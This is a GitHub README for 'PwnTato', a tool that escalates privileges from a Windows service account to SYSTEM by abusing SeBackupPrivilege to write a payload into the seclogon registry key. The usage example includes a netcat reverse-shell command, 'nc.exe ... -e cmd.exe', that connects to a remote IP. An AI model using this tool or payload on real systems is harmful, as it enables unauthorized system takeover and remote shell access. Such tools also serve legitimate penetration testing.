Skip to content

duty1g/PwnTato

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

PwnTato

PwnTato is a local privilege escalation tool that facilitates the transition from Windows Service Accounts to NT AUTHORITY\SYSTEM. It leverages the SeBackupPrivilege token privilege to inject a payload into the seclogon registry key.

PwnTato Logo

Features

  • SeBackupPrivilege Injection: PwnTato injects the SeBackupPrivilege token privilege into the process to manipulate registry keys.

  • Registry Key Manipulation: The tool allows users to input a custom payload, which is then written to the seclogon registry key.

Prerequisites

  • Windows operating system
  • PureBasic compiler (for compilation)

Usage

              ██      ██  ██
            ██  ██  ██  ██  ██  ██████
          ██  ██  ████  ██    ██    ██
        ██      ██  ██    ██  ██    ██
          ████  ██    ██    ██    ██
            ████  ██    ██  ██  ████
            ██▒▒████████████████▒▒██
            ██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
            ██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
            ██▒▒██  ▒▒▒▒▒▒▒▒  ██▒▒██
            ██▒▒████▒▒▒▒▒▒▒▒████▒▒██
            ██▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒██
            ██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
            ████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████
              ████████████████████
                      v1.0
               PwnTato by @duty1g


[+] SeBackupPrivilege token injected to the process
[!] Enter your seclogon payload: c:\windows\temp\nc.exe 192.168.1.2 1337 -e cmd.exe      

Binaries

Download the latest release from the Releases page. Choose the appropriate binary for your system.

Disclaimer

This tool is intended for educational and testing purposes only. The author is not responsible for any misuse or damage caused by the use of this tool.

Author

  • duty1g

Feel free to contribute or report issues!

About

another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors